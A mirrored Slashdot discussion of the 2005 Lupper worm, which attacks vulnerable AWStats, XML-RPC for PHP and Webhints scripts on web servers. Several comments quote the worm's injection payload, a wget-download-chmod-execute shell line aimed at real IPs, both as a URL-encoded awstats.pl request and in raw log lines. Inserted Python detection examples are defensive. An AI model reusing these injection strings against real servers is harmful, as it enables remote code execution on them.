Slashdot Mirror


Linux Lupper.Worm In the Wild

jurt1235 writes "McAfee reports that a Linux worm has been found in the wild. The Linux/Lupper.worm is a derivative of the Linux/Slapper worm which also exists for BSD, just to be crossplatform. From the McAfee description: The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed."

32 of 363 comments

  1. CONTINUE: by xtracto · · Score: 5, Funny

    Next, is a collection of messages telling that it is the fault of the system administrators and not a problem of the Linux Distributions.

    p.s. BURN KARMA BURN!

    --
    Ubuntu is an African word meaning 'I can't configure Debian'
    1. Re:CONTINUE: by freeweed · · Score: 4, Insightful

      Well, actually, yes. Seeing as no Linux distribution installs and runs a webserver, plus one of the affected PHP utilities, by default, this one is squarely on the administrator's shoulders.

      Understanding just WHAT a vulnerability affects is the key to knowing who's responsible.

      --
      Endless arguments over trivial contradictions in books written by ignorant savages to explain thunder in the dark.
  2. Remarkably Useless page. by Short+Circuit · · Score: 5, Interesting
    First, what vulnerability does it exploit? I wasn't able to find any decent info on Linux/Slapper, and that's all it references.

    Second, how do you remove it? Quoth the page:
    Removal Instructions
    AVERT recommends to always use latest DATs and engine . This threat will be cleaned if you have this combination.

    Additional Windows ME/XP removal considerations

    1. Re:Remarkably Useless page. by gowen · · Score: 5, Informative
      According to ZDNet/Symantec
      "The worm exploits three vulnerabilities to propagate: the XML-RPC for PHP Remote Code Injection vulnerability; AWStats Rawlog Plugin Logfile Parameter Input Validation vulnerability; and Darryl Burgdorf's Webhints Remote Command Execution Vulnerability, according to Symantec's online description of the worm.

      The XML-RPC flaw affects blogging, wiki and content management software and was discovered earlier this year. Patches are available for most systems. AWStats is a log analyzer tool; a fix for the flaw has been available since February. Darryl Burgdorf's Webhints is a hint generation script; no fixes are available for the script, according to Symantec's DeepSight Alert Services."
      --
      Athletic Scholarships to universities make as much sense as academic scholarships to sports teams.
    2. Re:Remarkably Useless page. by tomhudson · · Score: 4, Insightful

      More alarmist shit (and old news at that - The Reg reported this last week).

      Some php scripts that have as much to do with linux as a vulnerability in, say, photoshop, has to do with xp.

      The anti-virus writers are publicity whores looking to sensationalize their product, because in a few years nobody will be using them (Windows users will be stuck with the "free" version from Microsoft, and BSD/OSX/Linux users don't need an anti-virus).

    3. Re:Remarkably Useless page. by harlows_monkeys · · Score: 4, Informative
      More alarmist shit (and old news at that - The Reg reported this last week)

      My web server logs for my home machine are full of attempts to exploit these holes, coming from a large number of IP addresses.

      This indicates that this is indeed in the wild, and active, and spreading.

      Thus, it is not alarmist shit.

    4. Re:Remarkably Useless page. by tomhudson · · Score: 4, Insightful

      The key word is "attempts".

      Hey, look through your logs - you'll also see slapper in there, and code red, and all sorts of other stuff - but if it doesn't affect you, why give a shit?

      The number of affected machines is going to be VERY low. Fixes for one of the flaws have been out since February. My distro updates itself every couple of days. I'm not worried.

      Now:

      1. If you haven't updated your machine in years
      2. If you have those particular scripts installed
      3. If you allow files in /tmp to be run by processes from user "nobody"

      ... that's a LOT of ifs ...

      In other words, nothing to see here but more antivirus vendor fud.

    5. Re:Remarkably Useless page. by tomhudson · · Score: 4, Funny

      I'll tell you what, anyone wants some practice exploiting the hole, here's the IP address of a vulnerable machine to practice on: http://127.0.0.1/

      Knock yourselves out :-)

    6. Re:Remarkably Useless page. by Macrobat · · Score: 4, Funny

      You know, if you link to a porn site, you could at least warn us.

      --
      "Hardly used" will not fetch you a better price for your brain.
    7. Re:Remarkably Useless page. by budgenator · · Score: 4, Insightful

      step one go to securityfocus and update all of the applications listed on your system.
      Symptoms
      Presence of the following file:
      * /tmp/lupii
      One of the following ports are listening:
              * UDP 7111
              * UDP 7222

      so running su -c "netstat --listening --extend --program" tells you if it's even running, by listing what's listening on any port, such as UDP 7111 or 7222
      then it would be easy to
      su -c "kill -9 pid-of-lupii"
      su -c "rm /tmp/lupii"
      su -c "touch /tmp/lupii"

      the worm apparently does this
      echo '_begin_';echo `cd /tmp;wget xx.xx.193.244/lupii;chmod +x lupii;./lupii xx.xx.193.244 `;echo '_end_';exit;/*
      so unless your server has a vulnerability that allows privilege escalation from nobody, it's stuck in tmp directories or possibly in your html directories.

      --
      Apocalypse Cancelled, Sorry, No Ticket Refunds
  3. PHP exploit, not directly a linux problem? by Anonymous Coward · · Score: 5, Insightful

    Seems kind of wrong to name it exclusively a linux problem.

    1. Re:PHP exploit, not directly a linux problem? by mysqlrocks · · Score: 5, Informative

      Calling it a PHP exploit would be wrong as well. It's an exploit of specific applications written in PHP (AWStats and Drupal from what I could tell).

  4. if it attacks PHP cross-platform... by frankie · · Score: 4, Insightful

    ...then it's a PHP/*nix worm, not Linux specifically.

    Heck there's decent odds it could be modified to attack OSX PHP too. A shame the linked article provides ZERO information about exactly which scripts (and versions thereof) are vulnerable.

  5. Sadly a preview of things to come because... by Assmasher · · Score: 5, Insightful

    ...Linux is more and more popular with corporations holding valuable and important data.

    Success is a double-edged sword. ;)

  6. Complete infection by soren.harward · · Score: 5, Funny

    All sysadmins who are still running this insecure setup are advised to patch your systems immediately. Yes, all fourteen of you.

  7. Conditions for infection... by xutopia · · Score: 4, Insightful

    "If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed." I'm thinking this is funny as hell. How many people configure apache this way?

    1. Re:Conditions for infection... by maxwell+demon · · Score: 5, Funny

      Hey, I've found a way to write a true Linux worm! It can infect all Linux computers which have a user named "wormhole" with password "unsafe", and have a suid-root copy of bash installed at /bin/rootbash which is executable by user "wormhole". Ah, and of course the user "wormhole" must be able to remote login through either rlogin or ssh with password authentication enabled. To spread, the worm also needs the file /etc/wormspreadrc, which must contain a list of other vulnerable computers, one hostname or IP number per line.

      SCNR

      --
      The Tao of math: The numbers you can count are not the real numbers.
    2. Re:Conditions for infection... by smoking2000 · · Score: 5, Informative
      The command it runs is:
      |echo;echo YYY;cd /tmp;wget 24.224.174.18/listen;chmod +x listen;./listen 216.102.212.115;echo YYY;echo|
      It is passed to awstats.pl in a request like:
      GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2024%2e224%2e174%2e18%2flisten%3bc hmod%20%2bx%20listen%3b%2e%2flisten%20216%2e102%2e 212%2e115;echo%20YYY;echo| HTTP/1.1
      There are also POST request to xmlrpc.php pages, like:
      POST /drupal/xmlrpc.php HTTP/1.1
      So if you have /tmp mounted noexec this should not be a problem.
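
Added example, not part of any comment above: a host-side check for the symptoms listed in the thread (the /tmp/lupii file, UDP 7111/7222 listeners) together with the noexec-on-/tmp mitigation. The function names and the sample /proc text are constructed for illustration.

```python
import os

INDICATOR_PORTS = {7111, 7222}    # UDP ports from the symptom list above
INDICATOR_FILE = "lupii"          # file name reported in /tmp above

def bound_udp_ports(proc_net_udp):
    """Return the local ports found in /proc/net/udp text (IPv4 sockets only)."""
    ports = set()
    for row in proc_net_udp.splitlines():
        fields = row.split()
        if len(fields) > 1 and fields[0].endswith(":") and ":" in fields[1]:
            ports.add(int(fields[1].rsplit(":", 1)[1], 16))   # port is hex
    return ports

def tmp_is_noexec(proc_mounts):
    """True if the filesystem holding /tmp is mounted with noexec."""
    best, opts = "", ""
    for row in proc_mounts.splitlines():
        fields = row.split()
        # Only "/" and "/tmp" can hold /tmp; prefer the longer, later entry.
        if len(fields) >= 4 and fields[1] in ("/", "/tmp") and len(fields[1]) >= len(best):
            best, opts = fields[1], fields[3]
    return "noexec" in opts.split(",")

def assess(proc_net_udp, proc_mounts, tmp_names):
    """Combine the three checks into one report for a host."""
    return {
        "indicator_ports": sorted(bound_udp_ports(proc_net_udp) & INDICATOR_PORTS),
        "indicator_file": INDICATOR_FILE in tmp_names,
        "tmp_noexec": tmp_is_noexec(proc_mounts),
    }

# Constructed sample data in the kernel's /proc text formats.
SAMPLE_UDP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 00000000:0035 00000000:0000 07 00000000:00000000 00:00000000 00000000     0        0 1001
   1: 00000000:1BC7 00000000:0000 07 00000000:00000000 00:00000000 00000000    99        0 1002
"""
SAMPLE_MOUNTS = """\
/dev/sda1 / ext3 rw 0 0
tmpfs /tmp tmpfs rw,nosuid,nodev,noexec 0 0
"""

if __name__ == "__main__":
    print("sample:", assess(SAMPLE_UDP, SAMPLE_MOUNTS, ["lupii", "sess_1"]))
    if os.path.exists("/proc/net/udp"):                  # live Linux host
        with open("/proc/net/udp") as u, open("/proc/mounts") as m:
            print("live:  ", assess(u.read(), m.read(), os.listdir("/tmp")))
```
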
  8. Before all teh MSFT fanboys jump on this, by Anonymous Coward · · Score: 5, Funny

    Paraphrased from the virus description;

    IF you run a specific kernel version with some special module
    AND you run one of a couple specific versions of one package not installed by default
    AND you have a very "generic" config on that package
    AND you have some plugins enabled, but not configured for security
    AND you are on a world routable IP address
    AND you have some specific vulnerable scripts,

    THEN you might need to take a look at if you are at risk.

    Paraphrased from the virus description of most MSFT worms:

    IF you run an MSFT operating system
    AND you haven't reformatted your HDD in the last hour

    THEN it's time to pucker up and kiss the sucker goodbye..

    -GenTimJS

  9. Re:How can we get some free press? by jellomizer · · Score: 4, Insightful

    Because it seems to only affect Linux and BSD systems (With a different worm). Other systems running PHP are not affected. So yes it is a linux worm. Like many of the Windows worms are not Windows Worms, but IE or OutLook Worms.

    --
    If something is so important that you feel the need to post it on the internet... It probably isn't that important.
  10. Too many ifs by SolitaryMan · · Score: 5, Interesting

    If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment ...

    which in practice means that your admin has died a couple of years ago but was never replaced.

    --
    May Peace Prevail On Earth
  11. Short of detail by QuaintRealist · · Score: 4, Informative

    So here is some, shamelessly cribbed from e-week. The worm actually attempts to attack three different web services:

    "The XML-RPC hole commonly exists in blogging and Wiki programs. There are now fixes available for this hole for most systems.

    AWStats is a popular, open-source log-file analyzer. Only servers which run AWStats 5.0 to 6.3 can be attacked. Versions 6.4, which came out in March, and higher are immune.

    Finally, Webhints is an older script program that's designed to set up and maintain a "Hint (Quote/Tip/Joke/Whatever) of the Day" page. Version 1.3 is vulnerable to attack. There is, at this time, no known fix for the program. "

    This still does not tell me which blogging/wiki programs are affected, only that "most" have fixes - more info, anyone?

    --
    Using plain ol' text since 1968
  12. Does it look like this? by Mabonus · · Score: 5, Informative

    I just noticed this today, and from what I've heard here it sounds a likely candidate. IP addresses obscured for politeness.

    193.166.84 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:12 -0700] "GET /scgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd %20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3b chmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e19 3%2e244;echo%20YYY;echo| HTTP/1.1" 404 225 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo%20YYY;cd% 20%2ftmp%3bwget%2062%2e101%2e193%2e244%2flupii%3bc hmod%20%2bx%20lupii%3b%2e%2flupii%2062%2e101%2e193 %2e244;echo%20YYY;echo| HTTP/1.1" 401 3787 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    .
    .
    .
    193.166.84 - - [04/Nov/2005:15:10:31 -0700] "POST /xmlsrv/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:33 -0700] "POST /blog/xmlrpc.php HTTP/1.1" 404 221 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    193.166.84 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1;)"
    .
    .
    .
    For 60 hits.
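
Added example, not part of the post above: detection logic for the two request patterns shown in this thread (shell metacharacters in the AWStats `configdir` parameter, and POSTs to `xmlrpc.php`), reporting from the status code whether the probe found anything. The function names are hypothetical and the sample lines are constructed, with documentation addresses and a harmless stand-in payload.

```python
import re
from collections import Counter
from urllib.parse import unquote

# Combined Log Format: host ident user [time] "METHOD target HTTP/x" status ...
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (.*) HTTP/[\d.]+" (\d{3}) ')
# Characters a legitimate AWStats configdir (a directory path) never needs.
SHELL_META = re.compile(r"[|;`$&<>]")

def outcome(status):
    """Map the response code to what the probe found on this server."""
    if 200 <= status < 300:
        return "reached-script"      # the script exists and ran: check the host
    if status in (401, 403):
        return "denied"
    return "not-present" if status == 404 else "other"

def classify(line):
    """Return (host, kind, outcome) for a Lupper-style probe, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    host, method, target, status = m.groups()
    # Logs pasted through a forum pick up stray spaces; drop them first.
    path, _, query = target.replace(" ", "").partition("?")
    kind = None
    if path.endswith("/awstats.pl"):
        for pair in query.split("&"):
            key, _, value = pair.partition("=")
            if key == "configdir" and SHELL_META.search(unquote(value)):
                kind = "awstats-configdir-injection"
    elif method == "POST" and path.endswith("/xmlrpc.php"):
        kind = "xmlrpc-post"         # body is not logged, so this is only a lead
    return (host, kind, outcome(int(status))) if kind else None

def summarize(lines):
    """Count probes per (host, kind, outcome)."""
    return Counter(hit for hit in map(classify, lines) if hit)

# Constructed sample lines: documentation addresses, stand-in payload.
SAMPLE = [
    '192.0.2.10 - - [04/Nov/2005:15:10:10 -0700] "GET /cgi-bin/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bid;echo%20YYY;echo| HTTP/1.1" 404 224 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [04/Nov/2005:15:10:14 -0700] "GET /awstats/awstats.pl?configdir=|echo;echo% 20YYY;echo| HTTP/1.1" 200 512 "-" "Mozilla/4.0"',
    '192.0.2.10 - - [04/Nov/2005:15:10:34 -0700] "POST /drupal/xmlrpc.php HTTP/1.1" 404 223 "-" "Mozilla/4.0"',
    '203.0.113.5 - - [04/Nov/2005:15:11:00 -0700] "GET /awstats/awstats.pl?config=example.org HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for (host, kind, result), n in sorted(summarize(SAMPLE).items()):
        print(f"{host:15} {kind:28} {result:15} {n}")
```

A `reached-script` result for the AWStats pattern is the case that warrants checking the host itself; a 404 only shows the script was not at that URL.
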

  13. I'm not worried... by PoprocksCk · · Score: 5, Funny

    I doubt I'll have the libraries required to run this worm.

  14. Re:How can we get some free press? by sqlrob · · Score: 5, Insightful

    IE Worm = Windows worm.

    Remember, IE is integrated into the OS according to MS, therefore it is a Windows worm.

  15. Other links by AndroidCat · · Score: 4, Informative
    --
    One line blog. I hear that they're called Twitters now.
  16. Gnu! by rabel · · Score: 4, Funny

    That's Gnu/Linux worm to you, you insensitive clod!

  17. clearly a violation by FudRucker · · Score: 4, Funny

    if this worm does not include the sourcecode with every computer it infects it is violating the terms and conditions of the GNU/GPL

    --
    Politics is Treachery, Religion is Brainwashing
  18. Re:Linux/BSD only by mysqlrocks · · Score: 4, Insightful

    Seriously, though; isn't everyone fairly aware that PHP ain't that secure?

    No, PHP is secure. Some applications written in PHP are insecure. Programmers can introduce security vulnerabilities in any language. Bad programming is not language specific.

  19. It's not Windows by max+born · · Score: 5, Informative

    From the Security Focus article: Affected systems will need to be wiped and have the OS reinstalled, in most cases.

    Apache usually runs as user nobody with very limited privileges. I doubt you'd need to wipe and reinstall the OS. That's why lupper runs in /tmp.

  20. AWStats is a PHP application? by smartfart · · Score: 4, Informative

    Um, AWStats isn't written in PHP, but in Perl. This isn't a PHP worm, it's a CGI exploit which happens to target PHP apps, plus the occasional Perl app.

  21. You're wrong. by khasim · · Score: 4, Insightful
    It will come up because it is true.
    No. It will keep coming up because people who don't understand security will keep bringing it up.

    There is a reason that more homes are robbed than banks, even though the banks have far more money in them than the homes do.

    The banks have better security than the homes do. So, even though more people go into a bank every day than go into your home, and the bank keeps lots more money in it than you keep in your home, because of the security, the bank is far less likely to be successfully robbed than your home.
    As for the worm, I didn't say it was a flaw in Linux, I was merely pointing out that security issues that affect Linux systems will rise as the success of Linux rises.
    That's what you believe. Yet my bank example shows that popularity has nothing to do with security.
    Maybe you should mod that as 'master of the obvious', but it doesn't make it any less accurate.
    That is because your statement is as inaccurate as possible already.

    By your "logic", banks would be robbed far more often than homes or cars or people because they are more popular.

    And security is why this worm will not do much damage.
    http://securityresponse.symantec.com/avcenter/venc/data/linux.plupii.html

    Look for "Number of Infections: 0-49".

    Oooooh! Scary! All those millions of Linux sites out there and fewer than 50 have been infected! Ooooooh!

    What's that? "Number of Sites: 0-2"?

    That means that fewer than 3 sites have been infected? Out of all of the Linux installations out there?

    Yeah, "security issues" will certainly be a problem as more people use Linux. I feel really bad for those 2 sites (or less) that were hit by this. Yep. It's a real threat.